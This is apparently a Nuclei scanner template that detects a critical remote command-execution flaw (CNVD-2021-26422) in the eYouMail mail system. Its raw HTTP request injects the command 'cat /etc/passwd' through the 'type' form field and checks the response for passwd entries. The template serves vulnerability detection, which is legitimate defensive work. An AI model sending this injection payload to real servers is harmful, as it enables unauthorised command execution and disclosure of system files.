id: CNVD-2021-26422

info:
  name: eYouMail - Remote Code Execution
  author: daffainfo
  severity: critical
  description: eYouMail is susceptible to a remote code execution vulnerability.
  reference:
    - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
    - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: Eyou-mail system

http:
  - raw:
      - |
        POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        type='|cat /etc/passwd||'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 490a0046304402201ee36adf50f32ae67f64599b94d2b9dfa6a4a0094adc93f90ecab288cecc93290220254600764abc5267785430750c6f77bf40fe664896993a2fbcc0d779fc106ae8:922c64590222798bb761d5b6d8e72950
